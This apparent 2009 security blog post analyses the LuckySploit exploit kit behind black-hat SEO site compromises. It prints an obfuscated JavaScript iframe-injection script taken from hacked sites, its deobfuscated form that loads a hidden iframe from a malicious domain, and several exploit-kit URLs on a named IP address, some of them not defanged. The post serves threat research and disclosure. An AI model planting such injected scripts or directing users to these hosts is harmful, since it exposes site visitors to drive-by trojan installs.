Thursday, April 9, 2009

Black Hat SEO - RBN Hacks, p.2

The silent threat: Black Hat SEO - Cyber Crime Toolkit Exposed

Welcome to LuckySploit:) ITS TOASTED

READ THIS page if you need more information


WARNING: All sites listed on this page are dangerous (live URL with exploits) which lead
to trojans beeing automatically installed on your computer.
Do NOT visit them unless you know what you are doing.
(only links are safe)


A nice article provided by Finjan about the Lucky Sploit toolkit, one of the
latest script kiddies that cyber criminals used these days can be found
following this link: LuckySploit Toolkit Exposed

Using well known technic such as "Code Obfuscation" most often used to
hide its first intention (sometimes randomly generated), here is one of the
numerous malicious script found on several compromised website.

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>
<script>function c102916999516l4963660743084(l4963660743855){
var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));}
function l4963660744fc7(l4963660745797){
function l4963660746f0b(){return 2;}
var l4963660745f69='';
l4963660747eab=String.fromCharCode;
for(l4963660746738=0;l4963660746738<l4963660745797.length;
l4963660746738+=l4963660746f0b()){
l4963660745f69+=(l4963660747eab(c102916999516l4963660743084(
l4963660745797.substr(l4963660746738,l4963660746f0b()))));}
return l4963660745f69;}
var x60='';
var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60
+'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x
60+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+
'5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+
x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+
'352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+
'3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+
'3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+
'125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+
x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+
'6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+
'3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+
x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+
'352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+
x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+
x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+
x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+
x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+
'32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+
x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+
'3925373425373925336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+
x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+
'325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+
'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+
x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+
'3726'+x60+'970743E';alert(l4963660744fc7(l4963660748680));
</script>

The deobfuscated result is:

<script>
if(!myia){document.write(unescape('%3c%69%66%72%61%6d%65%20%6e
%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%
2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f%63%
68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%
34%39%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%
65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%
65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}
var myia=true;
</script>

and then load the IFRAME.

<iframe name=c10 src='hxxp://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'></iframe>

Note that the script found in the second redirection show a lot of chat which refer
different IPs or hacking problems (IFRAME injected) Google search for "if(!myia)" iframe


An example of site on the same IP:

gogo2me.netresolve to 94.247.2.157 [hs.2-157.zlkon.lv]

and then load an IFRAME (with the LuckySpoit)

hxxp://94.247.2.157/.dif/go.php?sid=1
hxxp://94.247.2.157/.lck/?t=3
hxxp://94.247.2.157/.lck/?t=6
http://94.247.2.157/.lck/?90f6ff8e287ae123...
http://94.247.2.157/.lck/?75c4a0ecf4a4836...

Wepawet Analysis

A ThreatExpert analysis also indicate the relationship with these viruses/malware:

Zlob variant (Trojan-Spy.Win32.Zbot), keylogger's trojan (Trojan-Spy.Zbot.YETH) and some
TDSS (Alias Alureon) variant Win32.Fasec [Ikarus]


And here I just show you the line :) Also note the use of RSA algorithm (screenshot)

nextkey = '';
k = '';
attack_level = 0;
try {
f = 'Welcome to LuckySploit:) \n ITS TOASTED';
} catch (e){
}